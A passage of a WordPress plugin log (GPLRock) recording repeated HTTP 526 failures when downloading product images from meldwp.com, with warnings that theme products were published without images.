Code: 526, Error: . Retrying... [11-Apr-2026 00:56:12 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/focux---multi-purpose-single-product-woocommerce-wordpress-theme-24565.webp for product focux-multi-purpose-single-product-woocommerce-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [11-Apr-2026 00:56:12 UTC] GPLRock: Image download failed for product focux-multi-purpose-single-product-woocommerce-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [11-Apr-2026 00:56:14 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/agora--event--conference-wordpress-theme-22879.webp for product agora-event-conference-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [11-Apr-2026 00:56:14 UTC] GPLRock: Image download failed for product agora-event-conference-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [11-Apr-2026 00:56:14 UTC] GPLRock: Image download failed for product focux-multi-purpose-single-product-woocommerce-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [11-Apr-2026 00:56:16 UTC] GPLRock: Image download failed for product agora-event-conference-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [11-Apr-2026 00:56:17 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/focux---multi-purpose-single-product-woocommerce-wordpress-theme-24565.webp for product focux-multi-purpose-single-product-woocommerce-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [11-Apr-2026 00:56:17 UTC] GPLRock WARNING: Image download failed for product focux-multi-purpose-single-product-woocommerce-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/focux---multi-purpose-single-product-woocommerce-wordpress-theme-24565.webp [11-Apr-2026 00:56:17 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: focux-multi-purpose-single-product-woocommerce-wordpress-theme [11-Apr-2026 00:56:17 UTC] GPLRock: Image download failed for product politeck-political-party-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [11-Apr-2026 00:56:18 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/agora--event--conference-wordpress-theme-22879.webp for product agora-event-conference-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [11-Apr-2026 00:56:18 UTC] GPLRock WARNING: Image download failed for product agora-event-conference-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/agora--event--conference-wordpress-theme-22879.webp [11-Apr-2026 00:56:18 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: agora-event-conference-wordpress-theme [11-Apr-2026 00:56:18 UTC] GPLRock: Image download failed for product notech-it-solutions-services-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [11-Apr-2026 00:56:19 UTC] GPLRock: Image download failed for product politeck-political-party-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [11-Apr-2026 00:56:20 UTC] GPLRock: Image download failed for product notech-it-solutions-services-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [11-Apr-2026 00:56:21 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/politeck---political-party-wordpress-theme-10599.webp for product politeck-political-party-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [11-Apr-2026 00:56:21 UTC] GPLRock: Image download failed for product politeck-political-party-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [11-Apr-2026 00:56:22 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/notech---it-solutions--services-wordpress-theme-13830.webp for product notech-it-solutions-services-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [11-Apr-2026 00:56:23 UTC] GPLRock: Image download failed for product notech-it-solutions-services-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [11-Apr-2026 00:56:23 UTC] GPLRock: Image download failed for product politeck-political-party-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [11-Apr-2026 00:56:25 UTC] GPLRock: Image download failed for product notech-it-solutions-services-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [11-Apr-2026 00:56:25 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/politeck---political-party-wordpress-theme-10599.webp for product politeck-political-party-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [11-Apr-2026 00:56:25 UTC] GPLRock WARNING: Image download failed for product politeck-political-party-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/politeck---political-party-wordpress-theme-10599.webp [11-Apr-2026 00:56:25 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: politeck-political-party-wordpress-theme [11-Apr-2026 00:56:25 UTC] GPLRock: Image download failed for product akhash-broadband-internet-services-provider-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [11-Apr-2026 00:56:27 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/notech---it-solutions--services-wordpress-theme-13830.webp for product notech-it-solutions-services-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [11-Apr-2026 00:56:27 UTC] GPLRock WARNING: Image download failed for product notech-it-solutions-services-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/notech---it-solutions--services-wordpress-theme-13830.webp [11-Apr-2026 00:56:27 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: notech-it-solutions-services-wordpress-theme [11-Apr-2026 00:56:27 UTC] GPLRock: Image download failed for product bootstrap-nexgen-html-template (attempt 1/3). HTTP Code: 526, Error: . Retrying... [11-Apr-2026 00:56:27 UTC] GPLRock: Image download failed for product akhash-broadband-internet-services-provider-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [11-Apr-2026 00:56:29 UTC] GPLRock: Image download failed for product bootstrap-nexgen-html-template (attempt 2/3). HTTP Code: 526, Error: . Retrying... [11-Apr-2026 00:56:30 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/akhash---broadband--internet-services-provider-wordpress-theme-2990.webp for product akhash-broadband-internet-services-provider-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [11-Apr-2026 00:56:30 UTC] GPLRock: Image download failed for product akhash-broadband-internet-services-provider-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [11-Apr-2026 00:56:31 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/bootstrap---nexgen-html-template-27860.webp for product bootstrap-nexgen-html-template after 3 attempts. HTTP Code: 526, Error: [11-Apr-2026 00:56:31 UTC] GPLRock: Image download failed for product bootstrap-nexgen-html-template (attempt 1/3). HTTP Code: 526, Error: . Retrying... [11-Apr-2026 00:56:33 UTC] GPLRock: Image download failed for product bootstrap-nexgen-html-template (attempt 2/3). HTTP Code: 526, Error: . Retrying... [11-Apr-2026 00:56:35 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/bootstrap---nexgen-html-template-27860.webp for product bootstrap-nexgen-html-template after 3 attempts. HTTP Code: 526, Error: [11-Apr-2026 00:56:35 UTC] GPLRock WARNING: Image download failed for product bootstrap-nexgen-html-template. URL: https://meldwp.com/wp-content/uploads/bootstrap---nexgen-html-template-27860.webp [11-Apr-2026 00:56:35 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: bootstrap-nexgen-html-template [11-Apr-2026 00:56:36 UTC] GPLRock: Image download failed for product plazart-construction-equipment-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [11-Apr-2026 00:56:38 UTC] GPLRock: Image download failed for product plazart-construction-equipment-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [11-Apr-2026 00:56:40 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/plazart---construction-equipment-wordpress-theme-29330.webp for product plazart-construction-equipment-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [11-Apr-2026 00:56:40 UTC] GPLRock: Image download failed for product plazart-construction-equipment-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [11-Apr-2026 00:56:42 UTC] GPLRock: Image download failed for product plazart-construction-equipment-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [11-Apr-2026 00:56:44 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/plazart---construction-equipment-wordpress-theme-29330.webp for product plazart-construction-equipment-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [11-Apr-2026 00:56:44 UTC] GPLRock WARNING: Image download failed for product plazart-construction-equipment-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/plazart---construction-equipment-wordpress-theme-29330.webp [11-Apr-2026 00:56:44 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: plazart-construction-equipment-wordpress-theme [11-Apr-2026 00:56:44 UTC] GPLRock: Image download failed for product lofter-art-blogging-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [11-Apr-2026 00:56:46 UTC] GPLRock: Image download failed for product lofter-art-blogging-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [11-Apr-2026 00:56:49 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/lofter---art-blogging-wordpress-theme-2554.webp for product lofter-art-blogging-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [11-Apr-2026 00:56:49 UTC] GPLRock: Image download failed for product lofter-art-blogging-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [11-Apr-2026 00:56:51 UTC] GPLRock: Image download failed for product lofter-art-blogging-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [11-Apr-2026 00:56:53 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/lofter---art-blogging-wordpress-theme-2554.webp for product lofter-art-blogging-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [11-Apr-2026 00:56:53 UTC] GPLRock WARNING: Image download failed for product lofter-art-blogging-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/lofter---art-blogging-wordpress-theme-2554.webp [11-Apr-2026 00:56:53 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: lofter-art-blogging-wordpress-theme [11-Apr-2026 00:56:53 UTC] GPLRock: Image download failed for product evne-creative-portfolio-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [11-Apr-2026 00:56:55 UTC] GPLRock: Image download failed for product evne-creative-portfolio-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [11-Apr-2026 00:56:57 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/evne---creative-portfolio-wordpress-theme-29356.webp for product evne-creative-portfolio-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [11-Apr-2026 00:56:58 UTC] GPLRock: Image download failed for product evne-creative-portfolio-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [11-Apr-2026 00:57:00 UTC] GPLRock: Image download failed for product evne-creative-portfolio-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [11-Apr-2026 00:57:02 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/evne---creative-portfolio-wordpress-theme-29356.webp for product evne-creative-portfolio-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [11-Apr-2026 00:57:02 UTC] GPLRock WARNING: Image download failed for product evne-creative-portfolio-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/evne---creative-portfolio-wordpress-theme-29356.webp [11-Apr-2026 00:57:02 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: evne-creative-portfolio-wordpress-theme [11-Apr-2026 00:57:02 UTC] GPLRock: Image download failed for product habitro-nutrition-health-and-diet-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [11-Apr-2026 00:57:04 UTC] GPLRock: Image download failed for product habitro-nutrition-health-and-diet-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [11-Apr-2026 00:57:06 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/habitro---nutrition-health-and-diet-wordpress-theme-25023.webp for product habitro-nutrition-health-and-diet-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [11-Apr-2026 00:57:06 UTC] GPLRock: Image download failed for product habitro-nutrition-health-and-diet-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [11-Apr-2026 00:57:08 UTC] GPLRock: Image download failed for product habitro-nutrition-health-and-diet-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [11-Apr-2026 00:57:11 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/habitro---nutrition-health-and-diet-wordpress-theme-25023.webp for product habitro-nutrition-health-and-diet-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [11-Apr-2026 00:57:11 UTC] GPLRock WARNING: Image download failed for product habitro-nutrition-health-and-diet-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/habitro---nutrition-health-and-diet-wordpress-theme-25023.webp [11-Apr-2026 00:57:11 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: habitro-nutrition-health-and-diet-wordpress-theme [11-Apr-2026 00:57:11 UTC] GPLRock: Image download failed for product niobis-consulting-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [11-Apr-2026 00:57:13 UTC] GPLRock: Image download failed for product niobis-consulting-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [11-Apr-2026 00:57:15 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/niobis---consulting-wordpress-theme-4776.webp for product niobis-consulting-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [11-Apr-2026 00:57:15 UTC] GPLRock: Image download failed for product niobis-consulting-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [11-Apr-2026 00:57:17 UTC] GPLRock: Image download failed for product niobis-consulting-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [11-Apr-2026 00:57:19 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/niobis---consulting-wordpress-theme-4776.webp for product niobis-consulting-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [11-Apr-2026 00:57:19 UTC] GPLRock WARNING: Image download failed for product niobis-consulting-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/niobis---consulting-wordpress-theme-4776.webp [11-Apr-2026 00:57:19 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: niobis-consulting-wordpress-theme [12-Apr-2026 00:47:37 UTC] GPLRock: Image download failed for product ainext-ai-agency-startup-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [12-Apr-2026 00:47:39 UTC] GPLRock: Image download failed for product ainext-ai-agency-startup-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [12-Apr-2026 00:47:40 UTC] GPLRock: Image download failed for product theband-music-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [12-Apr-2026 00:47:41 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/ainext---ai-agency--startup-wordpress-theme-21009.webp for product ainext-ai-agency-startup-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [12-Apr-2026 00:47:41 UTC] GPLRock: Image download failed for product ainext-ai-agency-startup-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [12-Apr-2026 00:47:42 UTC] GPLRock: Image download failed for product theband-music-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [12-Apr-2026 00:47:44 UTC] GPLRock: Image download failed for product ainext-ai-agency-startup-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [12-Apr-2026 00:47:44 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/theband-music-wordpress-theme-14736.webp for product theband-music-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [12-Apr-2026 00:47:44 UTC] GPLRock: Image download failed for product theband-music-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [12-Apr-2026 00:47:46 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/ainext---ai-agency--startup-wordpress-theme-21009.webp for product ainext-ai-agency-startup-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [12-Apr-2026 00:47:46 UTC] GPLRock WARNING: Image download failed for product ainext-ai-agency-startup-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/ainext---ai-agency--startup-wordpress-theme-21009.webp [12-Apr-2026 00:47:46 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: ainext-ai-agency-startup-wordpress-theme [12-Apr-2026 00:47:46 UTC] GPLRock: Image download failed for product headline-news-clean-and-modern-magazine-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [12-Apr-2026 00:47:46 UTC] GPLRock: Image download failed for product theband-music-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [12-Apr-2026 00:47:48 UTC] GPLRock: Image download failed for product headline-news-clean-and-modern-magazine-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [12-Apr-2026 00:47:48 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/theband-music-wordpress-theme-14736.webp for product theband-music-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [12-Apr-2026 00:47:48 UTC] GPLRock WARNING: Image download failed for product theband-music-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/theband-music-wordpress-theme-14736.webp [12-Apr-2026 00:47:48 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: theband-music-wordpress-theme [12-Apr-2026 00:47:48 UTC] GPLRock: Image download failed for product larson-architecture-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [12-Apr-2026 00:47:50 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/headline-news---clean-and-modern-magazine-theme-9905.webp for product headline-news-clean-and-modern-magazine-theme after 3 attempts. HTTP Code: 526, Error: [12-Apr-2026 00:47:50 UTC] GPLRock: Image download failed for product headline-news-clean-and-modern-magazine-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [12-Apr-2026 00:47:51 UTC] GPLRock: Image download failed for product larson-architecture-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [12-Apr-2026 00:47:52 UTC] GPLRock: Image download failed for product headline-news-clean-and-modern-magazine-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [12-Apr-2026 00:47:53 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/larson---architecture-wordpress-theme-7516.webp for product larson-architecture-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [12-Apr-2026 00:47:53 UTC] GPLRock: Image download failed for product larson-architecture-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [12-Apr-2026 00:47:54 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/headline-news---clean-and-modern-magazine-theme-9905.webp for product headline-news-clean-and-modern-magazine-theme after 3 attempts. HTTP Code: 526, Error: [12-Apr-2026 00:47:54 UTC] GPLRock WARNING: Image download failed for product headline-news-clean-and-modern-magazine-theme. URL: https://meldwp.com/wp-content/uploads/headline-news---clean-and-modern-magazine-theme-9905.webp [12-Apr-2026 00:47:54 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: headline-news-clean-and-modern-magazine-theme [12-Apr-2026 00:47:55 UTC] GPLRock: Image download failed for product galicia-restaurant-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [12-Apr-2026 00:47:55 UTC] GPLRock: Image download failed for product larson-architecture-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [12-Apr-2026 00:47:57 UTC] GPLRock: Image download failed for product galicia-restaurant-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [12-Apr-2026 00:47:57 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/larson---architecture-wordpress-theme-7516.webp for product larson-architecture-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [12-Apr-2026 00:47:57 UTC] GPLRock WARNING: Image download failed for product larson-architecture-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/larson---architecture-wordpress-theme-7516.webp [12-Apr-2026 00:47:57 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: larson-architecture-wordpress-theme [12-Apr-2026 00:47:57 UTC] GPLRock: Image download failed for product iqconnetik-modern-call-center-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [12-Apr-2026 00:47:59 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/galicia---restaurant-wordpress-theme-1320.webp for product galicia-restaurant-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [12-Apr-2026 00:47:59 UTC] GPLRock: Image download failed for product galicia-restaurant-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [12-Apr-2026 00:47:59 UTC] GPLRock: Image download failed for product iqconnetik-modern-call-center-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [12-Apr-2026 00:48:01 UTC] GPLRock: Image download failed for product galicia-restaurant-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [12-Apr-2026 00:48:01 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/iqconnetik---modern-call-center-wordpress-theme-26924.webp for product iqconnetik-modern-call-center-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [12-Apr-2026 00:48:02 UTC] GPLRock: Image download failed for product iqconnetik-modern-call-center-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [12-Apr-2026 00:48:03 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/galicia---restaurant-wordpress-theme-1320.webp for product galicia-restaurant-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [12-Apr-2026 00:48:03 UTC] GPLRock WARNING: Image download failed for product galicia-restaurant-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/galicia---restaurant-wordpress-theme-1320.webp [12-Apr-2026 00:48:03 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: galicia-restaurant-wordpress-theme [12-Apr-2026 00:48:03 UTC] GPLRock: Image download failed for product styleshop-responsive-clothing-fashion-store-wordpress-woocommerce-theme-mobile-layout-ready (attempt 1/3). HTTP Code: 526, Error: . Retrying... [12-Apr-2026 00:48:04 UTC] GPLRock: Image download failed for product iqconnetik-modern-call-center-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [12-Apr-2026 00:48:05 UTC] GPLRock: Image download failed for product styleshop-responsive-clothing-fashion-store-wordpress-woocommerce-theme-mobile-layout-ready (attempt 2/3). HTTP Code: 526, Error: . Retrying... [12-Apr-2026 00:48:06 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/iqconnetik---modern-call-center-wordpress-theme-26924.webp for product iqconnetik-modern-call-center-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [12-Apr-2026 00:48:06 UTC] GPLRock WARNING: Image download failed for product iqconnetik-modern-call-center-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/iqconnetik---modern-call-center-wordpress-theme-26924.webp [12-Apr-2026 00:48:06 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: iqconnetik-modern-call-center-wordpress-theme [12-Apr-2026 00:48:06 UTC] GPLRock: Image download failed for product wellspring-aqua-filters-drinking-water-delivery-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [12-Apr-2026 00:48:07 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/styleshop---responsive-clothing-fashion-store-wordpress-woocommerce-theme-mobile-32001.webp for product styleshop-responsive-clothing-fashion-store-wordpress-woocommerce-theme-mobile-layout-ready after 3 attempts. HTTP Code: 526, Error: [12-Apr-2026 00:48:08 UTC] GPLRock: Image download failed for product styleshop-responsive-clothing-fashion-store-wordpress-woocommerce-theme-mobile-layout-ready (attempt 1/3). HTTP Code: 526, Error: . Retrying... [12-Apr-2026 00:48:08 UTC] GPLRock: Image download failed for product wellspring-aqua-filters-drinking-water-delivery-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [12-Apr-2026 00:48:10 UTC] GPLRock: Image download failed for product styleshop-responsive-clothing-fashion-store-wordpress-woocommerce-theme-mobile-layout-ready (attempt 2/3). HTTP Code: 526, Error: . Retrying... [12-Apr-2026 00:48:10 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/wellspring--aqua-filters--drinking-water-delivery-wordpress-theme-28665.webp for product wellspring-aqua-filters-drinking-water-delivery-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [12-Apr-2026 00:48:10 UTC] GPLRock: Image download failed for product wellspring-aqua-filters-drinking-water-delivery-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [12-Apr-2026 00:48:12 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/styleshop---responsive-clothing-fashion-store-wordpress-woocommerce-theme-mobile-32001.webp for product styleshop-responsive-clothing-fashion-store-wordpress-woocommerce-theme-mobile-layout-ready after 3 attempts. HTTP Code: 526, Error: [12-Apr-2026 00:48:12 UTC] GPLRock WARNING: Image download failed for product styleshop-responsive-clothing-fashion-store-wordpress-woocommerce-theme-mobile-layout-ready. URL: https://meldwp.com/wp-content/uploads/styleshop---responsive-clothing-fashion-store-wordpress-woocommerce-theme-mobile-32001.webp [12-Apr-2026 00:48:12 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: styleshop-responsive-clothing-fashion-store-wordpress-woocommerce-theme-mobile-layout-ready [12-Apr-2026 00:48:12 UTC] GPLRock: Image download failed for product medicora-doctor-medical-clinic-elementor-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [12-Apr-2026 00:48:12 UTC] GPLRock: Image download failed for product wellspring-aqua-filters-drinking-water-delivery-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [12-Apr-2026 00:48:14 UTC] GPLRock: Image download failed for product medicora-doctor-medical-clinic-elementor-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [12-Apr-2026 00:48:14 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/wellspring--aqua-filters--drinking-water-delivery-wordpress-theme-28665.webp for product wellspring-aqua-filters-drinking-water-delivery-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [12-Apr-2026 00:48:14 UTC] GPLRock WARNING: Image download failed for product wellspring-aqua-filters-drinking-water-delivery-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/wellspring--aqua-filters--drinking-water-delivery-wordpress-theme-28665.webp [12-Apr-2026 00:48:14 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: wellspring-aqua-filters-drinking-water-delivery-wordpress-theme [12-Apr-2026 00:48:15 UTC] GPLRock: Image download failed for product revelance-multione-page-business-parallax-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [12-Apr-2026 00:48:16 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/medicora---doctor--medical-clinic-elementor-wordpress-theme-25710.webp for product medicora-doctor-medical-clinic-elementor-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [12-Apr-2026 00:48:16 UTC] GPLRock: Image download failed for product medicora-doctor-medical-clinic-elementor-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [12-Apr-2026 00:48:17 UTC] GPLRock: Image download failed for product revelance-multione-page-business-parallax-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [12-Apr-2026 00:48:19 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/revelance---multione-page-business-parallax-theme-20127.webp for product revelance-multione-page-business-parallax-theme after 3 attempts. HTTP Code: 526, Error: [12-Apr-2026 00:48:19 UTC] GPLRock: Image download failed for product revelance-multione-page-business-parallax-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [12-Apr-2026 00:48:21 UTC] GPLRock: Image download failed for product revelance-multione-page-business-parallax-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [12-Apr-2026 00:48:23 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/revelance---multione-page-business-parallax-theme-20127.webp for product revelance-multione-page-business-parallax-theme after 3 attempts. HTTP Code: 526, Error: [12-Apr-2026 00:48:23 UTC] GPLRock WARNING: Image download failed for product revelance-multione-page-business-parallax-theme. URL: https://meldwp.com/wp-content/uploads/revelance---multione-page-business-parallax-theme-20127.webp [12-Apr-2026 00:48:23 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: revelance-multione-page-business-parallax-theme [12-Apr-2026 00:48:23 UTC] GPLRock: Image download failed for product investex-corporate-accounting-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [12-Apr-2026 00:48:25 UTC] GPLRock: Image download failed for product investex-corporate-accounting-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [12-Apr-2026 00:48:28 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/investex---corporate--accounting-theme-20747.webp for product investex-corporate-accounting-theme after 3 attempts. HTTP Code: 526, Error: [12-Apr-2026 00:48:28 UTC] GPLRock: Image download failed for product investex-corporate-accounting-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [12-Apr-2026 00:48:30 UTC] GPLRock: Image download failed for product investex-corporate-accounting-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [12-Apr-2026 00:48:32 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/investex---corporate--accounting-theme-20747.webp for product investex-corporate-accounting-theme after 3 attempts. HTTP Code: 526, Error: [12-Apr-2026 00:48:32 UTC] GPLRock WARNING: Image download failed for product investex-corporate-accounting-theme. URL: 